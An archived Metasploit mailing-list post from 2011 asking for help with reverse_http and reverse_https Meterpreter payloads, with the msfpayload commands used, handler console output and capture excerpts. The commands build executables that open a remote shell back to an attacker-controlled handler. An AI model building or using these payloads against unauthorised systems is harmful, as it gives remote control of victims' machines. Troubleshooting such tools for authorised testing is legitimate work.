Metasploit mailing list archives
reverse_http(s) issues
From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Thu, 22 Sep 2011 10:08:57 +0300
For the impatient, both payloads are not working for me "tested on two separate machines, win7 x64, and one XP x86" no AV, help will be highly appreciated. HTTP: the payload connects to the handler, get the second stage, a session is created, then nothing "i.e. when I switch to the session, it doesn't accept any command", the exe keeps running. HTTPS: the payload connects to the handler, but the second stage get sent "16 times"... then nothing, no session created, and the exe quits. I've included the msfpayload command, the output of msfconsole, and a couple of lines from dumpcap, if I'm doing something wrong please correct me... thanks in advance. Sherif Eldeeb =================== reverse_http issue: =================== =================== # msfpayload windows/meterpreter/reverse_http LPORT=8080 LHOST=HANDLER_MACHINE X > rev_http.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_http Length: 350 Options: {"LPORT"=>"8080", "LHOST"=>"HANDLER_MACHINE"} =================== msf exploit(handler) > [*] TARGET_MACHINE:55541 Request received for /INITM... Win32: /INITM [*] TARGET_MACHINE:55541 Staging connection for target /INITM received... [*] Patched transport at offset 486516... [*] Patched URL at offset 486248... [*] Patched Expiration Timeout at offset 641856... [*] Patched Communication Timeout at offset 641860... [*] Meterpreter session 2 opened (HANDLER_MACHINE:8080 -> TARGET_MACHINE:55541) at 2011-09-22 09:23:14 +0300 msf exploit(handler) > sessions -i 2 [*] Starting interaction with 2... meterpreter > sysinfo [-] Unknown command: sysinfo. meterpreter > ? meterpreter > load stdapi [-] Failed to load extension: No response was received to the core_loadlib request. ... ... (i.e. nothing...) =================== < dumpcap GET /INITM HTTP/1.1 User-Agent: wininet Host: HANDLER_MACHINE:8080 Cache-Control: no-cache HTTP/1.1 200 OK Content-Type: application/octet-stream Connection: close Server: Rex Content-Length: 752128 MZ.....[REU............Wh....P..h..* h....P.............................!..L.!This program cannot be run in DOS mode. .... .... =================== reverse_https issue: =================== =================== # msfpayload windows/meterpreter/reverse_https LPORT=443 LHOST=HANDLER_MACHINE X > rev.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_https Length: 370 Options: {"LPORT"=>"443", "LHOST"=>"HANDLER_MACHINE"} =================== msf exploit(handler) > [*] Sending stage (752128 bytes) to TARGET_MACHINE ... REPEATED 16 TIMES ... REPEATED 16 TIMES ... [*] Sending stage (752128 bytes) to TARGET_MACHINE msf exploit(handler) > =================== < dumpcap ..............!..L.!This program cannot be run in DOS mode. // the server sends the second stage.. 16 times _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- reverse_http(s) issues Sherif El-Deeb (Sep 22)
- Re: reverse_http(s) issues HD Moore (Sep 23)
- Message not available
- Fwd: reverse_http(s) issues Sherif El-Deeb (Sep 23)
- Message not available
- Re: reverse_http(s) issues Sherif El-Deeb (Sep 23)
- Re: reverse_http(s) issues HD Moore (Sep 23)
- Re: reverse_http(s) issues HD Moore (Sep 23)